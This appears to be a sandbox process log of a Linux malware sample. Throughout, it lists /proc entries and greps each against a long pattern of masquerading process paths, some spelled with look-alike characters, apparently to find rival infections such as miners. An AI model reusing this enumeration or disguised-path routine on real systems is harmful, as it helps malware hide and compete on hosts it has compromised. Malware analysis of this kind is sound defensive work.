/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1039
-
-
/bin/grepgrep exe2⤵PID:1043
-
-
/bin/lsls -latrh /proc/7012⤵PID:1042
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1045
-
-
/bin/grepgrep exe2⤵PID:1049
-
-
/bin/lsls -latrh /proc/7052⤵PID:1048
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1051
-
-
/bin/grepgrep exe2⤵PID:1054
-
-
/bin/lsls -latrh /proc/7082⤵PID:1053
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1056
-
-
/bin/grepgrep exe2⤵PID:1060
-
-
/bin/lsls -latrh /proc/712⤵PID:1059
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1062
-
-
/bin/grepgrep exe2⤵PID:1065
-
-
/bin/lsls -latrh /proc/722⤵PID:1064
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1067
-
-
/bin/grepgrep exe2⤵PID:1070
-
-
/bin/lsls -latrh /proc/7232⤵PID:1069
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1072
-
-
/bin/grepgrep exe2⤵PID:1075
-
-
/bin/lsls -latrh /proc/732⤵PID:1074
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1077
-
-
/bin/grepgrep exe2⤵PID:1080
-
-
/bin/lsls -latrh /proc/742⤵PID:1079
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1082
-
-
/bin/grepgrep exe2⤵PID:1085
-
-
/bin/lsls -latrh /proc/752⤵PID:1084
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1087
-
-
/bin/grepgrep exe2⤵PID:1090
-
-
/bin/lsls -latrh /proc/762⤵PID:1089
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1092
-
-
/bin/grepgrep exe2⤵PID:1095
-
-
/bin/lsls -latrh /proc/772⤵PID:1094
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1097
-
-
/bin/grepgrep exe2⤵PID:1100
-
-
/bin/lsls -latrh /proc/792⤵PID:1099
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1102
-
-
/bin/grepgrep exe2⤵PID:1105
-
-
/bin/lsls -latrh /proc/82⤵PID:1104
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1107
-
-
/bin/grepgrep exe2⤵PID:1110
-
-
/bin/lsls -latrh /proc/812⤵PID:1109
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1112
-
-
/bin/grepgrep exe2⤵PID:1115
-
-
/bin/lsls -latrh /proc/822⤵PID:1114
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1117
-
-
/bin/grepgrep exe2⤵PID:1120
-
-
/bin/lsls -latrh /proc/92⤵PID:1119
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1122
-
-
/bin/grepgrep exe2⤵PID:1125
-
-
/bin/lsls -latrh /proc/buddyinfo2⤵PID:1124
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1127
-
-
/bin/grepgrep exe2⤵PID:1130
-
-
/bin/lsls -latrh /proc/bus2⤵PID:1129
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1132
-
-
/bin/grepgrep exe2⤵PID:1135
-
-
/bin/lsls -latrh /proc/cgroups2⤵PID:1134
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1137
-
-
/bin/grepgrep exe2⤵PID:1140
-
-
/bin/lsls -latrh /proc/cmdline2⤵PID:1139
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1142
-
-
/bin/grepgrep exe2⤵PID:1145
-
-
/bin/lsls -latrh /proc/consoles2⤵PID:1144
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1147
-
-
/bin/grepgrep exe2⤵PID:1150
-
-
/bin/lsls -latrh /proc/cpuinfo2⤵PID:1149
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1152
-
-
/bin/grepgrep exe2⤵PID:1155
-
-
/bin/lsls -latrh /proc/crypto2⤵PID:1154
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1157
-
-
/bin/grepgrep exe2⤵PID:1160
-
-
/bin/lsls -latrh /proc/devices2⤵PID:1159
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1162
-
-
/bin/grepgrep exe2⤵PID:1165
-
-
/bin/lsls -latrh /proc/device-tree2⤵PID:1164
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1167
-
-
/bin/grepgrep exe2⤵PID:1170
-
-
/bin/lsls -latrh /proc/diskstats2⤵PID:1169
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1172
-
-
/bin/grepgrep exe2⤵PID:1175
-
-
/bin/lsls -latrh /proc/dma2⤵PID:1174
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1177
-
-
/bin/grepgrep exe2⤵PID:1180
-
-
/bin/lsls -latrh /proc/driver2⤵PID:1179
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1182
-
-
/bin/grepgrep exe2⤵PID:1185
-
-
/bin/lsls -latrh /proc/execdomains2⤵PID:1184
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1187
-
-
/bin/grepgrep exe2⤵PID:1190
-
-
/bin/lsls -latrh /proc/fb2⤵PID:1189
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1194
-
-
/bin/grepgrep exe2⤵PID:1197
-
-
/bin/lsls -latrh /proc/filesystems2⤵PID:1196
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1200
-
-
/bin/grepgrep exe2⤵PID:1204
-
-
/bin/lsls -latrh /proc/fs2⤵PID:1203
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1206
-
-
/bin/grepgrep exe2⤵PID:1210
-
-
/bin/lsls -latrh /proc/interrupts2⤵PID:1209
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1213
-
-
/bin/grepgrep exe2⤵PID:1216
-
-
/bin/lsls -latrh /proc/iomem2⤵PID:1215
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1220
-
-
/bin/grepgrep exe2⤵PID:1223
-
-
/bin/lsls -latrh /proc/ioports2⤵PID:1222
-
-
